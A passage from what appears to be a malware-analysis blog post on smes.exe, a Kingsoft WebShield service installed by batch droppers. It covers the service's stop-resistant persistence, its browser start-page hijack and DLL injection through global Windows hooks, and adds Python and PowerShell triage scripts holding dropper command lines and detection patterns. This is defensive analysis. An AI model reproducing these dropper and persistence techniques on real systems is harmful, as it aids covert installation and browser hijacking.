<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">It then executes the batch file u.bat, which in turn runs three commands:</span> <span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">smes.exe -install (installs smes.exe as a service), smes.exe -start (starts the smes.exe service)</span> <span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> and</span> <span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">del %0 (deletes u.bat)</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">.</span></span></div>
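<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">Both batch files in this chain (300.bat and u.bat) are short, and their behaviour is typical of droppers: a registry import, a forced Explorer restart, service installation and self-deletion. The Python below is an added example, not the post's code, that triages batch text for those indicators and reports the line on which each appears. The two batch bodies are constructed from the post's description of each file, not recovered from the samples, and the command forms used for 300.bat (regedit /s, taskkill) are assumptions.</div>

```python
"""Static triage of small batch droppers for dropper-typical indicators.

Added example, not code from the post.  SAMPLES is constructed from the post's
description of 300.bat and u.bat; the exact commands are assumptions.
"""
import re

SAMPLES = {
    # 300.bat: imports 300.reg, then forcibly restarts explorer.exe (constructed)
    "300.bat": "@echo off\r\nregedit /s 300.reg\r\ntaskkill /f /im explorer.exe\r\nstart explorer.exe\r\n",
    # u.bat: installs and starts the smes.exe service, then deletes itself (constructed)
    "u.bat": "@echo off\r\nsmes.exe -install\r\nsmes.exe -start\r\ndel %0\r\n",
}

# indicator name -> pattern matched against each non-comment line
INDICATORS = {
    "registry-import":  re.compile(r"\bregedit(\.exe)?\s+(/s|-s)\b", re.I),
    "explorer-restart": re.compile(r"\btaskkill\b.*\bexplorer\.exe\b", re.I),
    # "<prog>.exe -install/-start" (as smes.exe uses) or the sc.exe equivalents
    "service-install":  re.compile(r"\b\S+\.exe\s+-(install|start)\b|\bsc(\.exe)?\s+(create|start)\b", re.I),
    # batch deleting its own path (%0 or %~f0)
    "self-delete":      re.compile(r"\bdel\b.*%(0\b|~f0)", re.I),
}


def triage(batch_text):
    """Return {indicator: [line numbers]} for every indicator seen in the batch."""
    hits = {}
    for lineno, line in enumerate(batch_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.lower().startswith(("rem ", "::")):
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(stripped):
                hits.setdefault(name, []).append(lineno)
    return hits


def triage_all(samples):
    """Triage a {filename: text} mapping; files with no hits get an empty dict."""
    return {fname: triage(text) for fname, text in samples.items()}


def is_suspicious(hits):
    """Self-deletion together with any other indicator is the dropper pattern."""
    return "self-delete" in hits and len(hits) > 1


if __name__ == "__main__":
    for fname, hits in triage_all(SAMPLES).items():
        print(fname, hits, "SUSPICIOUS" if is_suspicious(hits) else "")
```

The pattern set is intentionally small; the point is that the combination (registry import or service install plus self-deletion) is a much stronger signal than any single line, which is why the verdict is computed over the whole file rather than per match.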
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Smes.exe accepts five command-line switches:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-install</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">installs Kingsoft Antivirus Webshield Service</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-run</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">executes smes.exe as a normal process</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-uninstall</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">removes the Kingsoft Antivirus WebShield Service</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-start</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">executes smes.exe as a service process</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-console</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">executes smes.exe as a normal process with verbose logging enabled</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">A service named</span> <span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Kingsoft Antivirus WebShield Service</span> <span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">is created, so smes.exe is started every time the system boots.</span></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Service Name: Kingsoft Antivirus WebShield Service</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Display Name: Kingsoft Antivirus WebShield Service</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Service Type: SERVICE_INTERACTIVE_PROCESS, SERVICE_WIN32_OWN_PROCESS</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Service State: SERVICE_RUNNING</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Binary Path: C:\_target\smes\$APPDATA\smes\smes.exe</span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMIaWFztiGHexSfwHmq4FCBfjlc-zVrcQRoSSU_PLu1-CXxeRXnb14BTJg9np-M-JnGvEljQvA-Jl5V4GyA6N9mYtCvAkHHRhGbubxJB0crAXVYgkGloOWWdtWvlCjflVhgYUif0b1/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMIaWFztiGHexSfwHmq4FCBfjlc-zVrcQRoSSU_PLu1-CXxeRXnb14BTJg9np-M-JnGvEljQvA-Jl5V4GyA6N9mYtCvAkHHRhGbubxJB0crAXVYgkGloOWWdtWvlCjflVhgYUif0b1/s1600/11.png" height="48" width="320" /></a></span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
</div>
<div style="line-height: 1.15;">
</div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Once the service is started, it cannot be stopped from the Windows Services console: smes.exe does not report SERVICE_ACCEPT_STOP among the controls it accepts, so the console greys out the Stop button, as seen in the figure below.</span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIUktHl7lLSjlpLWC9K6PGoBurJcbVuTOxdRmlobUhps5GgZ0mC5gQy4Zn6PfuBMuEYG_M58qZxW891P5VcbND9LXJ5tzIWrySFiw0gjsqbGrqb0CFRecZSoiQgGjpub0-Xa_3hufq/s1600/22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIUktHl7lLSjlpLWC9K6PGoBurJcbVuTOxdRmlobUhps5GgZ0mC5gQy4Zn6PfuBMuEYG_M58qZxW891P5VcbND9LXJ5tzIWrySFiw0gjsqbGrqb0CFRecZSoiQgGjpub0-Xa_3hufq/s1600/22.png" height="208" width="320" /></a></span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<br /></div>
<div style="line-height: 1.15;">
</div>
<div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">However, the running smes.exe process can be terminated by its PID with Windows Task Manager or Sysinternals Process Explorer, which in turn stops the service. The service entry itself remains registered (and will start smes.exe again at the next boot) until it is removed, for example with the -uninstall switch.</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Note also that once smes.exe is running, the Internet Explorer start page visibly changes to http://www.hao144.info/1/. When the process is terminated, the start page reverts to the original.</span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28sg8JFyo4tf8cbJIHPOJgOyn-1maVayFuBa-ciOKVPrSh1P8OxON6oHNCwApLG1GhD3ArCzP8wV7BQISM7GocphZ2MrIzZQQp8_dWpUx__TfffxZAhYuE0F9WPn7kAG64xIcTv7o/s1600/33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28sg8JFyo4tf8cbJIHPOJgOyn-1maVayFuBa-ciOKVPrSh1P8OxON6oHNCwApLG1GhD3ArCzP8wV7BQISM7GocphZ2MrIzZQQp8_dWpUx__TfffxZAhYuE0F9WPn7kAG64xIcTv7o/s1600/33.png" height="178" width="320" /></a></span></div>
<div class="separator" style="clear: both; line-height: 1.15; text-align: center;">
<br /></div>
<div style="line-height: 1.15;">
</div>
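<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The following PowerShell triage script is an added example, not code from the original post or from Kingsoft. It queries the service described above, confirms that it refuses stop controls, terminates its process as the fallback the post describes, and records the Internet Explorer start page before and after. The service name is the one reported above; the registry location of the IE start page (HKCU\Software\Microsoft\Internet Explorer\Main, value “Start Page”) is the standard one and is not mentioned in the post. Run it from an elevated PowerShell session on an isolated analysis machine.</span></div>

```powershell
# Added triage script (not from the original analysis): inspect the WebShield
# service, confirm it does not accept stop controls, terminate its host process,
# and check whether the IE start page reverts. Run elevated on an analysis VM.

$svcName = 'Kingsoft Antivirus WebShield Service'   # service name from the analysis

# Win32_Service exposes AcceptStop; services.msc greys out the Stop button when
# the service's accepted controls lack SERVICE_ACCEPT_STOP.
$svc = Get-CimInstance Win32_Service -Filter "Name='$svcName'"
if (-not $svc) { Write-Host "Service '$svcName' is not installed."; return }

[pscustomobject]@{
    Name       = $svc.Name
    State      = $svc.State
    StartMode  = $svc.StartMode     # Auto means smes.exe is started at every boot
    AcceptStop = $svc.AcceptStop    # expected False while smes.exe is running
    PathName   = $svc.PathName      # should point at smes.exe
    ProcessId  = $svc.ProcessId
} | Format-List

# IE start page location (standard registry value, assumed; not stated in the post).
$ieMain = 'HKCU:\Software\Microsoft\Internet Explorer\Main'
$before = (Get-ItemProperty -Path $ieMain -Name 'Start Page' -ErrorAction SilentlyContinue).'Start Page'
Write-Host "Start Page while the service runs : $before"

# The SCM will not deliver SERVICE_CONTROL_STOP to a service that does not accept
# it, so fall back to killing the host process, as the post does with Task Manager.
if ($svc.AcceptStop) {
    Stop-Service -Name $svcName -Force
} elseif ($svc.ProcessId -gt 0) {
    Stop-Process -Id $svc.ProcessId -Force
    Start-Sleep -Seconds 2
}

# Verify: the service should now report Stopped and the start page should revert.
$state = (Get-CimInstance Win32_Service -Filter "Name='$svcName'").State
$after = (Get-ItemProperty -Path $ieMain -Name 'Start Page' -ErrorAction SilentlyContinue).'Start Page'
Write-Host "Service state after kill         : $state"
Write-Host "Start Page after kill            : $after"

# Killing the process does not remove persistence: the service entry survives
# until it is deleted (smes.exe -uninstall, or generically: sc.exe delete "<name>").
```

Checking AcceptStop before attempting Stop-Service avoids a misleading “cannot be stopped” error and tells you up front that process termination is the only route; the final state check is what confirms the start page change is tied to the running process rather than to a persistent registry edit.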
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">
</span></div>
<div style="line-height: 1.15;">
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In our analysis, smes.exe is not malicious by itself; however, its features (such as rewriting the browser start page to whatever its configuration file specifies) can be abused by malware authors.</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">To understand how the browser start page is modified, we next analyze the component DLLs of smes.exe.</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">kwssp.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">exports:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllCanUnloadNow</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllGetClassObject</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- non-malicious</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- reads the settings in the kws.ini file and passes them to the kswebshield.dll module</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- attempts to connect to labs.duba.net, a Kingsoft domain</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">kwsui.dll</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">exports:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DoDisplayLog</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">GetClassObject</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">GetHookStatus</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">SetWindowStyle</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Startup</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Stop</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">DllGetClassObject</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- non-malicious</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- loaded into all running processes through SetWindowsHookEx, which installs global WH_CBT (http://msdn.microsoft.com/en-us/library/windows/desktop/ms644977(v=vs.85).aspx) and WH_GETMESSAGE (message queue) hooks. Windows maps a global hook DLL into every GUI process on the desktop that receives the hooked events (of the same bitness as the hooking process), which is how the DLL ends up inside the processes listed below. A good read about Windows hooks plus two other process injection techniques is found in this article: http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiitLCwpWLThjftoP79uZ7wSdwc1OwSeVWex4Pp67phYLmXuc92x92GzmeJQqIkT-koKXXaNbILoT4an23OC26jIAmriMtMw6efFXI6ErmjDPTWmBMahhBgI610TmopI3HYHTDAn-Eq/s1600/44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiitLCwpWLThjftoP79uZ7wSdwc1OwSeVWex4Pp67phYLmXuc92x92GzmeJQqIkT-koKXXaNbILoT4an23OC26jIAmriMtMw6efFXI6ErmjDPTWmBMahhBgI610TmopI3HYHTDAn-Eq/s1600/44.png" height="78" width="320" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<br />
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- responsible for injecting kswebshield.dll into running processes</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">- checks whether it has been loaded into one of the following processes:</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">KSWebShield.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kxeserv.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kxfwsserv.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">winlogon.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">explorer.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kugoo.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">iexplore.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">360se.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">maxthon.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">theworld.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">ttraveler.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">greenbrowser.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">MyiQ.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">myie.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">tmshell.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">flashget.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">SogouExplorer.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
